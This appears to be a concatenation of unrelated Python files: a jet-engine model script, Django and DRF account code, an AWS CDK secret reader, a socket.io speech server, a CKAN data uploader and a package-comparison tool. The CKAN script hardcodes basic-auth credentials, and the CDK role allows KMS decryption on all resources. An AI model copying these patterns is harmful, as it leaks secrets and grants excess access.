des_vars.add_output('hpt:cool4:frac_P', 0.0),
des_vars.add_output('hpt:MN_out', 0.30),
des_vars.add_output('duct43:dPqP', 0.0051),
des_vars.add_output('duct43:MN_out', 0.30),
des_vars.add_output('lpt:effDes', 0.9),
des_vars.add_output('lpt:cool1:frac_P', 1.0),
des_vars.add_output('lpt:cool2:frac_P', 0.0),
des_vars.add_output('lpt:MN_out', 0.4),
des_vars.add_output('itduct:dPqP', 0.00),
des_vars.add_output('itduct:MN_out', 0.4),
des_vars.add_output('pt:effDes', 0.85),
des_vars.add_output('pt:MN_out', 0.4),
des_vars.add_output('duct12:dPqP', 0.00),
des_vars.add_output('duct12:MN_out', 0.4),
des_vars.add_output('nozzle:Cv', 0.99),
des_vars.add_output('lp_shaft:Nmech', 12750., units='rpm'),
des_vars.add_output('lp_shaft:HPX', 1800.0, units='hp'),
des_vars.add_output('ip_shaft:Nmech', 12000., units='rpm'),
des_vars.add_output('hp_shaft:Nmech', 14800., units='rpm'),
# des_vars.add_output('FAR', 0.02261)
# des_vars.add_output('W', 10.76, units='lbm/s')
# OFF DESIGN 1
des_vars.add_output('OD1_MN', 0.5),
des_vars.add_output('OD1_alt', 28000.0, units='ft'),
# des_vars.add_output('OD1_Fn_target', 5497.0, units='lbf'),
des_vars.add_output('OD1_P_target', 7500.0, units='hp')
# DESIGN CASE
prob.model.add_subsystem('DESIGN', Turboshaft())
prob.model.connect('alt', 'DESIGN.fc.alt')
prob.model.connect('MN', 'DESIGN.fc.MN')
prob.model.connect('T4max', 'DESIGN.balance.rhs:FAR')
prob.model.connect('nozz_PR_des', 'DESIGN.balance.rhs:W')
prob.model.connect('inlet:ram_recovery', 'DESIGN.inlet.ram_recovery')
prob.model.connect('inlet:MN_out', 'DESIGN.inlet.MN')
prob.model.connect('duct1:dPqP', 'DESIGN.duct1.dPqP')
prob.model.connect('duct1:MN_out', 'DESIGN.duct1.MN')
prob.model.connect('lpc:PRdes', 'DESIGN.lpc.PR')
prob.model.connect('lpc:effDes', 'DESIGN.lpc.eff')
prob.model.connect('lpc:MN_out', 'DESIGN.lpc.MN')
prob.model.connect('icduct:dPqP', 'DESIGN.icduct.dPqP')
prob.model.connect('icduct:MN_out', 'DESIGN.icduct.MN')
prob.model.connect('hpc_axi:PRdes', 'DESIGN.hpc_axi.PR')
prob.model.connect('hpc_axi:effDes', 'DESIGN.hpc_axi.eff')
prob.model.connect('hpc_axi:MN_out', 'DESIGN.hpc_axi.MN')
prob.model.connect('bld25:cool1:frac_W', 'DESIGN.bld25.cool1:frac_W')
prob.model.connect('bld25:cool2:frac_W', 'DESIGN.bld25.cool2:frac_W')
prob.model.connect('bld25:MN_out', 'DESIGN.bld25.MN')
prob.model.connect('hpc_centri:PRdes', 'DESIGN.hpc_centri.PR')
prob.model.connect('hpc_centri:effDes', 'DESIGN.hpc_centri.eff')
prob.model.connect('hpc_centri:MN_out', 'DESIGN.hpc_centri.MN')
prob.model.connect('bld3:cool3:frac_W', 'DESIGN.bld3.cool3:frac_W')
prob.model.connect('bld3:cool4:frac_W', 'DESIGN.bld3.cool4:frac_W')
prob.model.connect('bld3:MN_out', 'DESIGN.bld3.MN')
prob.model.connect('duct6:dPqP', 'DESIGN.duct6.dPqP')
prob.model.connect('duct6:MN_out', 'DESIGN.duct6.MN')
prob.model.connect('burner:dPqP', 'DESIGN.burner.dPqP')
prob.model.connect('burner:MN_out', 'DESIGN.burner.MN')
prob.model.connect('hpt:effDes', 'DESIGN.hpt.eff')
prob.model.connect('hpt:cool3:frac_P', 'DESIGN.hpt.cool3:frac_P')
prob.model.connect('hpt:cool4:frac_P', 'DESIGN.hpt.cool4:frac_P')
prob.model.connect('hpt:MN_out', 'DESIGN.hpt.MN')
prob.model.connect('duct43:dPqP', 'DESIGN.duct43.dPqP')
prob.model.connect('duct43:MN_out', 'DESIGN.duct43.MN')
prob.model.connect('lpt:effDes', 'DESIGN.lpt.eff')
prob.model.connect('lpt:cool1:frac_P', 'DESIGN.lpt.cool1:frac_P')
prob.model.connect('lpt:cool2:frac_P', 'DESIGN.lpt.cool2:frac_P')
prob.model.connect('lpt:MN_out', 'DESIGN.lpt.MN')
prob.model.connect('itduct:dPqP', 'DESIGN.itduct.dPqP')
prob.model.connect('itduct:MN_out', 'DESIGN.itduct.MN')
prob.model.connect('pt:effDes', 'DESIGN.pt.eff')
prob.model.connect('pt:MN_out', 'DESIGN.pt.MN')
prob.model.connect('duct12:dPqP', 'DESIGN.duct12.dPqP')
prob.model.connect('duct12:MN_out', 'DESIGN.duct12.MN')
prob.model.connect('nozzle:Cv', 'DESIGN.nozzle.Cv')
prob.model.connect('lp_shaft:Nmech', 'DESIGN.LP_Nmech')
prob.model.connect('lp_shaft:HPX', 'DESIGN.lp_shaft.HPX')
prob.model.connect('ip_shaft:Nmech', 'DESIGN.IP_Nmech')
prob.model.connect('hp_shaft:Nmech', 'DESIGN.HP_Nmech')
# prob.model.connect('FAR', 'DESIGN.burner.Fl_I:FAR')
# prob.model.connect('W', 'DESIGN.inlet.Fl_I:stat:W')
# OFF DESIGN CASES
pts = [] # 'OD1','OD2','OD3','OD4','OD5','OD6','OD7','OD8']
# for pt in pts:
# ODpt = prob.model.add_subsystem(pt, Turboshaft(design=False))
# prob.model.connect(pt+'_alt', pt+'.fc.alt')
# prob.model.connect(pt+'_MN', pt+'.fc.MN')
# # prob.model.connect(pt+'_Fn_target', pt+'.thrust_balance.rhs')
# prob.model.connect('inlet:ram_recovery', pt+'.inlet.ram_recovery')
# prob.model.connect('duct4:dPqP', pt+'.duct4.dPqP')
# prob.model.connect('duct6:dPqP', pt+'.duct6.dPqP')
# prob.model.connect('burner:dPqP', pt+'.burner.dPqP')
# prob.model.connect('duct11:dPqP', pt+'.duct11.dPqP')
# prob.model.connect('duct13:dPqP', pt+'.duct13.dPqP')
# prob.model.connect('nozzle:Cv', pt+'.nozzle.Cv')
# prob.model.connect('duct15:dPqP', pt+'.duct15.dPqP')
# prob.model.connect('hp_shaft:HPX', pt+'.hp_shaft.HPX')
# prob.model.connect('hpc:cool1:frac_W', pt+'.hpc.cool1:frac_W')
# prob.model.connect('hpc:cool1:frac_P', pt+'.hpc.cool1:frac_P')
# prob.model.connect('hpc:cool1:frac_work', pt+'.hpc.cool1:frac_work')
# prob.model.connect('hpc:cool2:frac_W', pt+'.hpc.cool2:frac_W')
# prob.model.connect('hpc:cool2:frac_P', pt+'.hpc.cool2:frac_P')
# prob.model.connect('hpc:cool2:frac_work', pt+'.hpc.cool2:frac_work')
# prob.model.connect('bld3:cool3:frac_W', pt+'.bld3.cool3:frac_W')
# prob.model.connect('bld3:cool4:frac_W', pt+'.bld3.cool4:frac_W')
# prob.model.connect('hpc:cust:frac_W', pt+'.hpc.cust:frac_W')
# prob.model.connect('hpc:cust:frac_P', pt+'.hpc.cust:frac_P')
# prob.model.connect('hpc:cust:frac_work', pt+'.hpc.cust:frac_work')
# prob.model.connect('hpt:cool3:frac_P', pt+'.hpt.cool3:frac_P')
# prob.model.connect('hpt:cool4:frac_P', pt+'.hpt.cool4:frac_P')
# prob.model.connect('lpt:cool1:frac_P', pt+'.lpt.cool1:frac_P')
# prob.model.connect('lpt:cool2:frac_P', pt+'.lpt.cool2:frac_P')
# prob.model.connect('bypBld:frac_W', pt+'.byp_bld.bypBld:frac_W')
# prob.model.connect('DESIGN.fan.s_PRdes', pt+'.fan.s_PRdes')
# prob.model.connect('DESIGN.fan.s_WcDes', pt+'.fan.s_WcDes')
# prob.model.connect('DESIGN.fan.s_effDes', pt+'.fan.s_effDes')
# prob.model.connect('DESIGN.fan.s_NcDes', pt+'.fan.s_NcDes')
# prob.model.connect('DESIGN.lpc.s_PRdes', pt+'.lpc.s_PRdes')
# prob.model.connect('DESIGN.lpc.s_WcDes', pt+'.lpc.s_WcDes')
# prob.model.connect('DESIGN.lpc.s_effDes', pt+'.lpc.s_effDes')
# prob.model.connect('DESIGN.lpc.s_NcDes', pt+'.lpc.s_NcDes')
# prob.model.connect('DESIGN.hpc.s_PRdes', pt+'.hpc.s_PRdes')
# prob.model.connect('DESIGN.hpc.s_WcDes', pt+'.hpc.s_WcDes')
# prob.model.connect('DESIGN.hpc.s_effDes', pt+'.hpc.s_effDes')
# prob.model.connect('DESIGN.hpc.s_NcDes', pt+'.hpc.s_NcDes')
# prob.model.connect('DESIGN.hpt.s_PRdes', pt+'.hpt.s_PRdes')
# prob.model.connect('DESIGN.hpt.s_WpDes', pt+'.hpt.s_WpDes')
# prob.model.connect('DESIGN.hpt.s_effDes', pt+'.hpt.s_effDes')
# prob.model.connect('DESIGN.hpt.s_NpDes', pt+'.hpt.s_NpDes')
# prob.model.connect('DESIGN.lpt.s_PRdes', pt+'.lpt.s_PRdes')
# prob.model.connect('DESIGN.lpt.s_WpDes', pt+'.lpt.s_WpDes')
# prob.model.connect('DESIGN.lpt.s_effDes', pt+'.lpt.s_effDes')
# prob.model.connect('DESIGN.lpt.s_NpDes', pt+'.lpt.s_NpDes')
# prob.model.connect('DESIGN.nozzle.Throat:stat:area',pt+'.core_flow_balance.rhs')
# prob.model.connect('DESIGN.inlet.Fl_O:stat:area', pt+'.inlet.area')
# prob.model.connect('DESIGN.fan.Fl_O:stat:area', pt+'.fan.area')
# prob.model.connect('DESIGN.splitter.Fl_O1:stat:area', pt+'.splitter.area1')
# prob.model.connect('DESIGN.splitter.Fl_O2:stat:area', pt+'.splitter.area2')
# prob.model.connect('DESIGN.duct4.Fl_O:stat:area', pt+'.duct4.area')
# prob.model.connect('DESIGN.lpc.Fl_O:stat:area', pt+'.lpc.area')
# prob.model.connect('DESIGN.duct6.Fl_O:stat:area', pt+'.duct6.area')
# prob.model.connect('DESIGN.hpc.Fl_O:stat:area', pt+'.hpc.area')
# prob.model.connect('DESIGN.bld3.Fl_O:stat:area', pt+'.bld3.area')
# prob.model.connect('DESIGN.burner.Fl_O:stat:area', pt+'.burner.area')
# prob.model.connect('DESIGN.hpt.Fl_O:stat:area', pt+'.hpt.area')
# prob.model.connect('DESIGN.duct11.Fl_O:stat:area', pt+'.duct11.area')
# prob.model.connect('DESIGN.lpt.Fl_O:stat:area', pt+'.lpt.area')
# prob.model.connect('DESIGN.duct13.Fl_O:stat:area', pt+'.duct13.area')
# prob.model.connect('DESIGN.byp_bld.Fl_O:stat:area', pt+'.byp_bld.area')
# prob.model.connect('DESIGN.duct15.Fl_O:stat:area', pt+'.duct15.area')
prob.setup(check=False)
# initial guesses
prob['DESIGN.balance.FAR'] = 0.02261
prob['DESIGN.balance.W'] = 10.76
prob['DESIGN.balance.pt_PR'] = 4.939
prob['DESIGN.balance.lpt_PR'] = 1.979
prob['DESIGN.balance.hpt_PR'] = 4.236
prob['DESIGN.fc.balance.Pt'] = 5.666
prob['DESIGN.fc.balance.Tt'] = 440.0
# for pt in pts:
# prob[pt+'.thrust_balance.indep'] = 0.02467
# prob[pt+'.core_flow_balance.indep'] = 320.931
# prob[pt+'.byp_flow_balance.indep'] = 5.105
# prob[pt+'.lp_shaft_balance.indep'] = 4666.1
# prob[pt+'.hp_shaft_balance.indep'] = 14705.7
# prob[pt+'.fc.balance.Pt'] = 5.2
# prob[pt+'.fc.balance.Tt'] = 440.0
# prob[pt+'.hpt.PR'] = 3.6200
# prob[pt+'.lpt.PR'] = 4.3645
# prob[pt+'.lpc.map.RlineMap'] = 2.0
# prob[pt+'.hpc.map.RlineMap'] = 2.0
st = time.time()
prob.set_solver_print(level=-1)
prob.set_solver_print(level=2, depth=1)
prob.run_model()
for pt in ['DESIGN']+pts:
viewer(prob, pt)
print()
print("time", time.time() - st)
|
from django.contrib.auth.views import PasswordChangeView
from django.urls import path
from telescope_shop.accounts.views import RegisterUserView, LogoutView, LoginVew, UpdateUserView, \
PasswordsChangeView, DeleteUserView, ProfileDetailsView
urlpatterns = [
path('register/', RegisterUserView.as_view(), name='register'),
path('update/', UpdateUserView.as_view(), name='update profile'),
path('login/', LoginVew.as_view(), name='login'),
path('logout/', LogoutView.as_view(), name='logout'),
path('profile/', ProfileDetailsView.as_view(), name='profile details'),
path('password/', PasswordsChangeView.as_view(), name='change password'),
path('delete/<int:pk>/', DeleteUserView.as_view(), name='delete profile'),
]
|
from .base_action import BaseAction
class Communication(BaseAction):
pass
class Integrations(BaseAction):
pass
class Workshops(BaseAction):
pass
|
def encode(num, return_type="int"):
"""Return varint for given number"""
out = []
while True:
# get first seven bits of number
first_seven = num & 0x7f
num = num >> 7
if num:
# there are more bytes, make msb of first seven 1 and continue
out.append(first_seven | 0x80)
else:
# small number, no more bytes left, add first_seven without setting msb, since it is the last byte
out.append(first_seven)
break
if return_type == "hex":
out = [hex(hex_int)[2:].zfill(2) for hex_int in out]
return out
|
from aws_cdk import (
aws_iam as iam,
aws_lambda as lambda_,
aws_secretsmanager as sm,
custom_resources as cr,
core
)
class SecretReader(lambda_.Function):
prefix = 'EcoStruxure'
def __init__(
self, scope: core.Construct, id: str,
secret: sm.Secret,
attribute_name: str = None) -> None:
super(SecretReader, self).__init__(
scope=scope,
id=id,
runtime=lambda_.Runtime.PYTHON_3_8,
code=lambda_.Code.from_asset('./cdk/l3_constructs/secrets_manager/SecretReaderCR'),
handler='index.handler'
)
self.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
'secretsmanager:DescribeSecret',
'secretsmanager:GetSecretValue',
'secretsmanager:RotateSecret',
'secretsmanager:UpdateSecretVersionStage',
'secretsmanager:PutSecretValue'
],
resources=[secret.secret_arn]
))
self.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
'kms:Decrypt'
],
resources=['*']
))
provider = cr.Provider(
self, f'{id}Provider',
on_event_handler=self
)
custom_resource = core.CustomResource(
self, f'{id}CR',
service_token=provider.service_token,
properties={
"SecretArn": secret.secret_arn,
"AttributeName": attribute_name or None
}
)
self.secret_value = custom_resource.get_att_string('SecretValue')
|
from setuptools import setup, find_packages
INFO = {'name': 'Robot Brain',
'version': '0.2.0',
}
setup(
name = INFO['name'],
version = INFO['version'],
author = 'Jack Minardi',
packages = find_packages(),
zip_safe = False,
maintainer = 'Jack Minardi',
maintainer_email = 'jack@minardi.org',
platforms = ["Linux"],
)
|
import socketio
import eventlet
from typing import Text, List
from app.config import Config
from app.logging import logger
from app.services import S3Service, GoogleSpeechService
manager = socketio.BaseManager()
sio = socketio.Server(async_mode='eventlet', client_manager=manager, binary=True, cors_allowed_origins='*')
app = socketio.WSGIApp(sio, static_files={'/static': './app/ws/static/index.html'})
s3_service = S3Service()
speech_service = GoogleSpeechService()
@sio.event
def connect(sid: Text, environ) -> None:
logger.info(f"[{sid}]connected")
send_all()
@sio.event
def disconnect(sid) -> None:
logger.info(f"[{sid}]disconnected")
@sio.event
def voice_message(sid: Text, data: List[bytes]) -> None:
logger.info(f"[{sid}]received voice message")
file_path = s3_service.save_to_tmp(data)
file_path = s3_service.convert(file_path)
key = s3_service.upload(file_path)
result = s3_service.store_to_db(key)
url = s3_service.get_pre_signed_url(key)
texts = speech_service.to_text(str(file_path.resolve()))
logger.info(f"[{sid}] result:{texts}")
result.text = texts
s3_service.save(result)
sio.emit("send_result", {"id": result.id, "url": url, "texts": texts})
@sio.event
def message(sid: Text, data: Text) -> None:
logger.info(f"[{sid}]received message:{data}")
@sio.event
def delete_result(sid: Text, result_id: Text) -> None:
logger.info(f"[{sid}]received delete message:{result_id}")
s3_service.delete(result_id)
send_all()
def send_all():
data = s3_service.get_all_from_db()
logger.info(f"data size is {len(data)}")
results = []
for d in data:
url = s3_service.get_pre_signed_url(d.audio_key)
results.append({"id": d.id, "url": url, "texts": d.text})
sio.emit("send_results", results)
def run_server():
eventlet.wsgi.server(eventlet.listen(('', Config.WS_PORT)), app, log=logger)
|
#!/usr/bin/env python
import os
import errno
import IPython.html
import shutil
import urllib
from jinja2 import Environment
from jinja2 import FileSystemLoader
from install_lib import COLAB_ROOT_PATH
from install_lib import pjoin
from install_lib import CopyTreeRecursively
from install_lib import MakeDirectoryIfNotExist
from install_lib import RemoveDirectoryIfExist
from install_lib import RemoveFileIfExist
from install_lib import RemoveFileOrDirectoryIfExist
def BundleStatic(colab_root, dest, extra_template_args=None):
# Use the following default arguments for
template_args = {
'raw': '1',
'app_mode': False
}
if extra_template_args is not None:
template_args.update(extra_template_args)
# prepare the destination directory
MakeDirectoryIfNotExist(dest)
for d in ['colab', 'extern', 'ipython', 'closure', 'welcome', 'notebook']:
RemoveDirectoryIfExist(pjoin(dest, d))
ipython_static = IPython.html.DEFAULT_STATIC_FILES_PATH
colab_resources = pjoin(colab_root, 'colaboratory', 'resources')
colab_static = pjoin(colab_root, 'static')
closure = pjoin(colab_resources, 'closure-library', 'closure', 'goog')
# TODO: run git submodule init && git submodule update in COLAB_ROOT_PATH
# stage the basic colab and extern directories
CopyTreeRecursively(pjoin(colab_resources, 'colab'), pjoin(dest, 'colab'))
CopyTreeRecursively(pjoin(colab_resources, 'extern'), pjoin(dest, 'extern'))
# stage IPython's static files, then clobber them with patched versions
CopyTreeRecursively(ipython_static, pjoin(dest, 'ipython'))
RemoveFileOrDirectoryIfExist(pjoin(dest, 'ipython', 'components', '.git'))
CopyTreeRecursively(pjoin(colab_resources, 'ipython_patch'), pjoin(dest, 'ipython'))
# stage closure from the submodule
CopyTreeRecursively(closure, pjoin(dest, 'closure'))
# instantiate templates and stage the /, /welcome/, and /notebook/ URLs
template_path = os.path.join(colab_resources, "colab")
env = Environment(loader=FileSystemLoader(template_path))
CopyTreeRecursively(colab_static, pjoin(dest, 'static'))
for name in ['welcome', 'notebook']:
template = env.get_template(name + os.extsep + 'html');
for d in [pjoin(dest, name, 'index' + os.extsep + 'html'), pjoin(dest, 'colab', name + os.extsep + 'html')]:
path, filename = os.path.split(d)
MakeDirectoryIfNotExist(path)
with open(d, 'w') as f:
f.write(template.render(template_args))
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
dest = pjoin(COLAB_ROOT_PATH, 'build')
else:
dest = sys.argv[1]
BundleStatic(COLAB_ROOT_PATH, dest)
|
import dne
fob
|
from decimal import Decimal, getcontext
getcontext().prec = 20
u, v, w = Decimal(11111113), Decimal(-11111111), Decimal('7.51111111')
print((u + v) + w)
print(u + (v + w))
u, v, w = Decimal(20000), Decimal(-6), Decimal('6.0000003')
print((u*v) + (u*w))
print(u * (v+w))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import csv
import sys
import json
import ckanapi
import requests
import scraperwiki
def FetchSystemArguments():
'''Fetching arguments from the command line interface.'''
arguments = {
'api_key': sys.argv[1],
'json_path': sys.argv[2],
'download_temp_path': sys.argv[3],
'stag_url': 'https://test-data.hdx.rwlabs.org',
'prod_url': 'https://data.hdx.rwlabs.org'
}
#
# Checking that all arguments have been provided.
#
for argument in arguments:
if argument is None:
print 'Argument %s is empty. That argument is necessary.' % argument.keys()
return False
return arguments
def GetResourcesFromLocalJSON(local_json_path):
'''Loading resources from a local json file.'''
try:
with open(local_json_path) as json_file:
resources = json.load(json_file)
#
# Checking that the json provide contains at least
# one resource.
#
if len(resources) < 1:
print "Resouces look odd! Please revise"
return resources
except Exception as e:
print e
return False
def DownloadResourceFromHDX(ckan_url, file_name, resource_id, api_key, verbose = True):
'''Downloading a resource from CKAN based on its id. Resources need to be
downloaded in order to be correctly parsed by the CreateDatastore function.'''
print "Downloading resource file from HDX."
header = { 'Authorization': api_key }
#
# Querying.
#
url = ckan_url + '/api/action/resource_show?id=' + resource_id
r = requests.get(url, headers=header, auth=('dataproject', 'humdata'))
doc = r.json()
if doc['success'] is False:
if verbose:
print json.dumps(doc)
print 'Failed to read resource.'
return False
else:
resource_file_url = doc["result"]["url"]
#
# Downloading.
#
try:
with open(file_name, 'wb') as handle:
response = requests.get(resource_file_url, stream=True, headers=header, auth=('dataproject', 'humdata'))
if not response.ok:
print "Error: attempt to download resource failed."
return
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
except Exception as e:
print 'There was an error downlaoding the file.'
if verbose:
print e
return False
def DeleteDatastore(ckan_url, api_key, ckan_resource_id, verbose=True):
'''Delete a CKAN DataStore.'''
#
# Configuring the remote CKAN instance.
#
ckan = ckanapi.RemoteCKAN(ckan_url, apikey=api_key)
try:
ckan.action.datastore_delete(resource_id=ckan_resource_id, force=True)
except Exception as e:
print 'WARN: There was an error deleting an old DataStore.'
if verbose:
print e
pass
def CreateDatastore(ckan_url, api_key, resource_id, file_name, resource, verbose=True):
'''Creating a CKAN DataStore.'''
#
# Configuring the remote CKAN instance.
#
ckan = ckanapi.RemoteCKAN(ckan_url, apikey=api_key)
DeleteDatastore(ckan_url=ckan_url, api_key=api_key, ckan_resource_id=resource_id)
if DeleteDatastore(
ckan_url=ckan_url,
api_key=api_key,
ckan_resource_id=resource_id) is False:
return False
#
# Creating a DataStore.
#
ckan.action.datastore_create(
resource_id=resource_id,
force=True,
fields=resource['schema']['fields'],
primary_key=resource['schema'].get('primary_key'))
#
# Reading CSV file and inserting data.
#
reader = csv.DictReader(open(file_name))
rows = [ row for row in reader ]
#
# Hack for managing different encoding data.
#
rows_decoded = []
for row in rows:
row_encoded = { key:row[key].decode('latin-1') for key in row.keys() }
rows_decoded.append(row_encoded)
#
# Sending N records at a time.
#
chunksize = 10000 # N rows per POST request.
offset = 0
while offset < len(rows_decoded):
rowset = rows_decoded[offset:offset+chunksize]
ckan.action.datastore_upsert(
resource_id=resource_id,
force=True,
method='insert',
records=rowset)
offset += chunksize
complete = str(float(offset)/len(rows_decoded) * 100)[:4] + '%'
print(' Update successful: %s completed' % complete)
def Main():
'''Wrapper.'''
#
# Fetching arguments and configuring the script.
#
p = FetchSystemArguments()
api_key = p['api_key']
ckan_url = p['prod_url']
download_temp_path = p['download_temp_path']
#
# Loading resources from a local JSON file.
#
resources = GetResourcesFromLocalJSON(p['json_path'])
#
# Iterating over each resource provided.
#
for r in resources:
resource_id = r['resource_id']
print 'Creating DataStore for resource id: ' + resource_id
try:
DownloadResourceFromHDX(
ckan_url=ckan_url,
file_name=download_temp_path,
resource_id=resource_id,
api_key=api_key
)
CreateDatastore(
ckan_url=ckan_url,
api_key=api_key,
file_name=download_temp_path,
resource_id=resource_id,
resource=r
)
print 'All DataStores were created successfully.'
except Exception as e:
print 'DataStore creation failed.'
print e
return False
if __name__ == '__main__':
Main()
|
from rest_framework import serializers
from .models import UserProfile
from allauth.account.adapter import get_adapter
from rest_auth.registration import serializers as RegisterSerializer
from roboPortal.models import portalUser
class UserProfileSerializer(serializers.ModelSerializer, RegisterSerializer.RegisterSerializer):
password1 = serializers.CharField(write_only=True)
extra_kwargs = {
'password1' : {
'write_only':True,
'style':{'input_type':'password'}
}
}
class Meta:
model = UserProfile
fields = ('email','name','phone_no','password','password1')
extra_kwargs = {
'password' : {
'write_only':True,
'style':{'input_type':'password'}
},
'password1' : {
'write_only':True,
'style':{'input_type':'password'}
}
}
def validate(self, data):
if data['password'] != data['password1']:
raise serializers.ValidationError(("The two password fields didn't match."))
return data
def create(self,validated_data):
user = UserProfile.objects.create_user(
email = validated_data.get('email'),
name = validated_data.get('name'),
phone_no = validated_data.get('phone_no'),
password = validated_data.get('password')
)
a= portalUser(user = user)
a.save()
return user
def get_cleaned_data(self):
data_dict = super().get_cleaned_data()
data_dict['name'] = self.validated_data.get('name')
data_dict['phone_no'] = self.validated_data.get('phone_no')
return data_dict
class UserDetailsSerializer(serializers.ModelSerializer):
class Meta:
model = UserProfile
# fields = '__all__'
fields = ('id','email','name','phone_no')
read_only_fields = ('email',)
class UserDetailsTeamSerializer(serializers.ModelSerializer):
class Meta:
model = UserProfile
# fields = '__all__'
fields = ('name',)
read_only_fields = ('name',)
|
# -*- encoding=utf-8 -*-
"""
# **********************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# [oecp] is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
# Author:
# Create: 2021-09-03
# Description: repository
# **********************************************************************************
"""
import os
import logging
from collections import UserDict
import tempfile
import weakref
from oecp.utils.misc import path_is_remote, basename_of_path
from oecp.proxy.requests_proxy import do_download
from oecp.proxy.rpm_proxy import RPMProxy
from oecp.result.compare_result import *
logger = logging.getLogger("oecp")
class Repository(UserDict):
"""
多个rpm包组成一个repository
"""
def __init__(self, work_dir, name, category=None):
"""
:param work_dir: 工作目录
:param name: repository名称
:param category: 类别
"""
super(Repository, self).__init__()
self._work_dir = work_dir
self._download_dir = None # 如果包在远端,本地的下载路径,当不需要时删除此属性释放磁盘空间
self._name = RPMProxy.rpm_name(name)
self.verbose_path = name
self._category = category
self._category_level = category.category_of_src_package(self._name)
@property
def work_dir(self):
return self._work_dir
def upsert_a_rpm(self, path, verbose_path, debuginfo_path=None):
"""
增加一个rpm包
:param path: 包完整路径
:param verbose_path: 包展示路径
:param debuginfo_path: debuginfo包完整路径
:return:
"""
name = RPMProxy.rpm_name(basename_of_path(verbose_path))
category_level = self._category.category_of_bin_package(name)
logger.debug(f"repo {self._name} upsert a rpm, name: {name}, "
f"path: {path}, debuginfo_path: {debuginfo_path}, level: {category_level}")
rpm = {
"name": name,
"category": category_level,
"path": path,
"verbose_path": verbose_path,
"raw_path": path,
"debuginfo_path": debuginfo_path,
"raw_debuginfo_path": debuginfo_path
}
self[name] = rpm
@property
def download_dir(self):
if self._download_dir is None:
self._download_dir = tempfile.TemporaryDirectory(prefix="repo_", suffix=f"_{self._name}", dir=self._work_dir)
return self._download_dir.name
@download_dir.setter
def download_dir(self, path):
self._download_dir = path
@download_dir.deleter
def download_dir(self):
"""
释放下载的包占用的磁盘空间
:return:
"""
self._download_dir = None
def __getitem__(self, item):
"""
某些rpm的路径是远端时,此处会执行下载动作
:param item:
:return:
"""
rpm = super(Repository, self).__getitem__(item)
# download rpm rpm lazy
path = rpm.get("path")
if path_is_remote(path):
local_path = os.path.join(self.download_dir, basename_of_path(path))
do_download(path, local_path)
rpm["path"] = local_path
# download debuginfo rpm lazy
debuginfo_path = rpm.get("debuginfo_path")
if path_is_remote(debuginfo_path):
local_path = os.path.join(self.download_dir, basename_of_path(debuginfo_path))
do_download(debuginfo_path, local_path)
rpm["debuginfo_path"] = local_path
return rpm
def clean(self):
"""
:return:
"""
self.download_dir = None
def compare(self, that, plan):
"""
执行比较
:param that: 比较另一方
:param plan: 比较计划
:return:
"""
result = CompareResultComposite(
CMP_TYPE_REPOSITORY, CMP_RESULT_TO_BE_DETERMINED, self.verbose_path, that.verbose_path)
# 比较项存在依赖关系,将config、dumper、executor缓存下来传递,缓存通过比较项名称索引
# {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
compare_cache = {}
try:
for name in plan:
if plan.only_for_directory(name):
logger.debug(f"ignore plan.{name} for repository")
continue
if plan.check_specific_package(name, self._name):
logger.debug(f"plan.{name} not support {self._name}")
continue
if plan.check_specific_category(name, self._category_level):
logger.debug(f"plan.{name} not support {self._category_level}")
continue
logger.info(f"Analysis repo {self._name} [{name}]")
# get dumper, executor, config
dumper = plan.dumper_of(name)
executor = plan.executor_of(name)
config = plan.config_of(name)
compare_cache.setdefault(name, {})
this_dumper, that_dumper = dumper(self, compare_cache, config), dumper(that, compare_cache, config)
executor_ins = executor(this_dumper, that_dumper, config)
# set cache
compare_cache[name]["dumper"] = [this_dumper, that_dumper]
compare_cache[name]["work_dir"] = self._work_dir
# compare_cache[name]["executor"] = weakref.proxy(executor_ins)
result.add_component(*executor_ins.run())
# clean cache for tempfile
finally:
for _, dumpers in compare_cache.items():
for dumper in dumpers.get('dumper', []):
dumper.clean()
result.set_cmp_result()
return result
def find_sensitive_str(self, plan):
"""
执行查找
:param plan: 查找计划
:return:
"""
result = []
# 比较项存在依赖关系,将config、dumper、executor缓存下来传递,缓存通过比较项名称索引
# {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
compare_cache = {}
try:
for name in plan:
if not plan.check_sensitive_str(name):
logger.debug(f"plan.{name} not support {self._name}")
continue
logger.info(f"Analysis repo {self._name} [{name}]")
# get dumper, executor, config
dumper = plan.dumper_of(name)
executor = plan.executor_of(name)
config = plan.config_of(name)
compare_cache.setdefault(name, {})
this_dumper = dumper(self, compare_cache, config)
executor_ins = executor(this_dumper, config)
# set cache
compare_cache[name]["dumper"] = [this_dumper]
compare_cache[name]["work_dir"] = self._work_dir
# compare_cache[name]["executor"] = weakref.proxy(executor_ins)
res = executor_ins.run()
result.append(res)
# clean cache for tempfile
finally:
for _, dumpers in compare_cache.items():
for dumper in dumpers.get('dumper', []):
dumper.clean()
return result
def find_sensitive_image(self, plan):
"""
执行查找
:param plan: 查找计划
:return:
"""
result = []
# 比较项存在依赖关系,将config、dumper、executor缓存下来传递,缓存通过比较项名称索引
# {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
compare_cache = {}
try:
for name in plan:
if not plan.check_sensitive_image(name):
logger.debug(f"plan.{name} not support {self._name}")
continue
logger.info(f"compare repo {self._name} [{name}]")
# get dumper, executor, config
dumper = plan.dumper_of(name)
executor = plan.executor_of(name)
config = plan.config_of(name)
compare_cache.setdefault(name, {})
this_dumper = dumper(self, compare_cache, config)
executor_ins = executor(this_dumper, config)
# set cache
